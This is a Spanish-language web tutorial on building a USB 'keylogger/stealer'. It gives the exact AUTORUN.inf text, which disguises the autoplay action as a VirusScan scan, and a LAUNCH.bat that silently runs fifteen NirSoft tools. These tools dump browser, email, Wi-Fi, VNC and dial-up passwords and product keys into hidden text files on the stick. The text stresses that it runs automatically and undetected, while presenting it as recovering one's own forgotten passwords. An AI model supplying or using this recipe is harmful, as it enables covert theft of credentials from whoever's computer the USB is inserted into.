Cómo crear un USB Keylogger/Stealer para recuperar contraseñas

Existe un método a través del cual es posible generar archivos de rastreo de todas las contraseñas sin siquiera ser detectado

Para muchos el mundo informático contiene una serie de alternativas variadas que es muy complejo de rastrear. Y cuanta razón tiene esta premisa, pues más sencillo de lo que parece está la posibilidad de incluir una creación de cero para recuperar contraseñas. Todo esto es posible siguiendo sencillos pasos, además porque se tiene en cuenta la variante que en muchas ocasiones se utiliza no con fines extraños sino con la intensión de mantener una base de datos de todo lo referente al uso de tu dispositivo fijo o portátil.

Lo mejor de todo es que se ejecuta de manera automática y sin ser detectado, pues la USB de referencia va a estar trabajando en segundo plano. Así que empezamos con el tutorial. Lo primero que deben hacer es un proceso de reseteo o formateo de la USB, este es un proceso sencillo, veloz y que no acarrea problema alguno para el dispositivo. Existen dos maneras, una bajo el formato NTFS o la que identifica el FAT32; la segunda es la más recomendable. Luego se debe abrir un bloc de notas y se debe copiar lo siguiente: [autorun] open = launch.bat UseAutoPlay = 1 ACTION = Escaneando con VirusScan. Este archivo se guarda con el nombre AUTORUN.inf dentro de la USB.

Ahora se abre otro archivo txt donde se van a pegar los siguientes comandos: start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start PasswordFox.exe /stext passwordfox.txt start OperaPassView.exe /stext OperaPassView.txt start ChromePass.exe /stext ChromePass.txt start Dialupass.exe /stext Dialupass.txt start netpass.exe /stext netpass.txt start WirelessKeyView.exe /stext WirelessKeyView.txt start BulletsPassView.exe /stext BulletsPassView.txt start VNCPassView.exe /stext VNCPassView.txt start OpenedFilesView.exe /stext OpenedFilesView.txt start ProduKey.exe /stext ProduKey.txt start USBDeview.exe /stext USBDeview.txt. Igual, el archivo se guarda como LAUNCH.bat dentro de la memoria USB.

hackers
De una forma simple se puede crear una USB rastreable para detectar contraseñas de todo tipo

Los últimos pasos suelen ser los más determinantes

Ya se ha cumplido la gran mayoría de la tarea, de manera que lo que sigue es ir hasta www.nirsoft.net/ y descargar unos archivos, estos para ser más exactos: mspass.exe, mailpv.exe, iepv.exe, pspv.exe, PasswordFox.exe, OperaPassView.exe, ChromePass.exe, Dialupass2.exe, Netpass.exe, WirelessKeyView.exe, BulletsPassView.exe, VNCPassView.exe, OpenedFilesView.exe, ProduKey.exe, USBDeview.exe. Con este paso es momento de descomprimir los mismos dentro de la USB. Y ya es solo ocultarlos, para posteriormente sacar la USB, volverla a insertar y verificar su funcionamiento.

Para saberlo hay que revisar los txt que van apareciendo en la memoria, que no hace falta ver para saber de qué se trata. De esta forma tan sencilla se puede validar y tener siempre a la mano esos datos que suelen olvidarse con sencillez y que suelen ser de mucha utilidad.

Twitter cuentas corregidas